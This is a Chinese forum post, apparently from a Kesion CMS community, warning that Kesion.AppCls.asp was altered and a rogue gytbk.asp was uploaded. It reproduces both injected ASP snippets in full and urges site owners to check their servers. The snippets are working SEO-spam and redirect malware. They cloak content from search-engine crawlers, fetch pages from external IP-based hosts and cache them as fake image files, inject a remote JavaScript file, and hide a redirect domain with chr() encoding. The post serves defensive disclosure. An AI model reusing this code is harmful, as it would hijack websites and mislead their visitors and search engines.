|
|
 在KS_CLS中的Kesion.AppCls.asp 被篡改,加了以下代码 - <%function isspider()dim agent,searray,iagent="agent:"&LCase(request.servervariables("http_user_agent"))searray=array("sogou","bing","so","soso","yahoo") isspider= falsefor i=0 to ubound(searray)if (instr(agent,searray(i))>0) thenisspider=trueend ifnextend functionFunction BytesToBstr(body,Cset)dim ObjStreamSet ObjStream = Server.CreateObject("Adodb.Stream")ObjStream.Type = 1ObjStream.Mode = 3ObjStream.OpenObjStream.Write bodyObjStream.Position = 0ObjStream.Type = 2ObjStream.Charset = CsetBytesToBstr = ObjStream.ReadTextObjStream.CloseSet ObjStream = NothingEnd FunctionFunction GetHtml(url,bianma)dim str_url,objXMLHTTPSet objXMLHTTP = Server.CreateObject("Msxml2.ServerXMLHTTP")objXMLHTTP.Open "G"&"E"&"T",url,FalseobjXMLHTTP.sendGetHtml = objXMLHTTP.responseBodyGetHtml = BytesToBstr(GetHtml,bianma)Set objXMLHTTP = NothingEnd Functionfunction isBaiduSpider()dim BaiduagentBaiduagent="agent:"&LCase(request.servervariables("http_user_agent"))if instr(Baiduagent,"baidu") > 0 or instr(Baiduagent,"360spider") > 0 thenisBaiduSpider=trueend ifend functionfunction mainpage()dim mainindex,n,pagearray,indexquery,imainindex=LCase(request.ServerVariables("SCRIPT_NAME"))indexquery=LCase(request.ServerVariables("QUERY_STRING"))mainpage= falsepagearray=array("/index.","/default.","/main.")for i=0 to ubound(pagearray) if (instr(mainindex,pagearray(i))>0 and len(indexquery)<2) then mainpage=truenextend functionif isspider() and mainpage() then dim mfso,mfileurl,mfilecon,wfile mfileurl=Server.MapPath("/images/home1.gif") Set mfso=Server.CreateObject("Scripting.FileSystemObject") if Not mfso.FileExists(mfileurl) then dim content content = GetHtml("http://103.24.2.183:82/s.asp","gb2312") Set wfile = mfso.CreateTextFile(Server.MapPath("/images/home1.gif"),true) wfile.Write content wfile.Close response.clear response.write content response.write("<!--"&now()&"-->") response.flush Set wfile = Nothing response.end else Set wfile = mfso.OpenTextFile(Server.MapPath("/images/home1.gif"),1) content = wfile.ReadAll response.clear response.write content response.write("<!--"&now()&"-->") response.flush Set wfile = Nothing response.end end if Set mfso = Nothingelseif isBaiduSpider() and mainpage() then dim mmfso,mmfileurl,mmfilecon,mwfile,yuming,aaffaf yuming = "http://103.24.2.183/xxx.php?domain=" & request.ServerVariables("HTTP_HOST") mmfileurl=Server.MapPath("/images/baidu.gif") Set mmfso=Server.CreateObject("Scripting.FileSystemObject") if Not mmfso.FileExists(mmfileurl) then dim mcontent mcontent =GetHtml(yuming,"gb2312") Set mwfile = mmfso.CreateTextFile(Server.MapPath("/images/baidu.gif"),true) mwfile.Write mcontent mwfile.Close response.clear response.write mcontent response.write("<!--"&now()&"-->") response.flush Set mwfile = Nothing response.end else Set mwfile = mmfso.OpenTextFile(Server.MapPath("/images/baidu.gif"),1) mcontent = mwfile.ReadAll response.write mcontent response.write("<!--"&now()&"-->") response.flush Set mwfile = Nothing response.end end if Set mmfso = Nothingend ifDim p,runjs,rfr,reg,ip="(baidu)|(sogou)|(bing)|(so)|(360)|(soso)|(yahoo)|(lanjie)"rfr=UCase(request.ServerVariables("HTTP_REFERER"))runjs = 0Set reg = new regexpreg.ignorecase = Truereg.global = Truereg.pattern = pIf reg.test(rfr) Then runjs = 1End ifSet reg = Nothingif (mainpage() and runjs=1) then response.clear response.write("<scri"&"pt lang"&"uage='jav"&"as"&"cri"&"pt' src='http://20160688.com/1.js'></sc"&"ript><br/>") response.flush response.endend if%>
根目录上传了一个叫gytbk.asp的文件 相关代码 - <%Server.ScriptTimeout=60:on error resume next:Function GetHtml(url):Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP"):ObjXMLHTTP.Open "GET",url,False:ObjXMLHTTP.setRequestHeader "User-Agent","ForgetMe":ObjXMLHTTP.send:GetHtml=ObjXMLHTTP.responseBody:Set ObjXMLHTTP=Nothing:set objStream=Server.CreateObject("Adodb.Stream"):objStream.Type=1:objStream.Mode=3:objStream.Open:objStream.Write GetHtml:objStream.Position=0:objStream.Type=2:objStream.Charset="gb2312":GetHtml=objStream.ReadText:objStream.Close:End Function:domain = Request.ServerVariables("HTTP_HOST"):url = Request.ServerVariables("PATH_INFO")&"?"&Request.ServerVariables("QUERY_STRING"):if instr(domain,"www.") > 0 then:domain = replace(domain,"www.",""):end if:Pid=Split(Request.QueryString, "/"):Index=UBound(Pid):Crocus=Replace(Replace(Pid(Index),".html",""),".asp",""):response.write Crocus:If Not IsNumeric(Crocus) Then:Response.Clear:Response.Write "Request Error":Response.End:End If:Referer=LCase(Request.ServerVariables("HTTP_REFERER")):SearchEngine=Array("baidu.com","so.com","sogou.com","sm.cn"):For i=0 To UBound(SearchEngine):If InStr(Referer, SearchEngine(i)) > 0 Then :Response.Clear:Response.Redirect "http://"&chr(119)&chr(119)&chr(119)&chr(46)&chr(101)&chr(109)&chr(101)&chr(105)&chr(113)&chr(117)&chr(46)&chr(99)&chr(111)&chr(109)&"/info?auctionid=" & Crocus:Response.Flush:Response.End :End If :Next:Response.Clear:content = replace(GetHtml("http://"&chr(119)&chr(119)&chr(119)&chr(46)&chr(101)&chr(109)&chr(101)&chr(105)&chr(113)&chr(117)&chr(46)&chr(99)&chr(111)&chr(109)&":82/x.php?host="&domain&"&id="&Crocus),"tbkinfo.asp","gytbk.asp"):content = replace(content,"{$domain}",domain):content = replace(content,"{$url}",url):response.write content:Response.Flush:response.End%>
大家检查一下自己网站是不是有这些修改。
|
当前位置:
支持(0) | 
反对(0)
顶端 
底部
![电子邮件:[ otbbs@126.com ]](http://bbs.kesion.com/club/images/email.gif){kind=small}
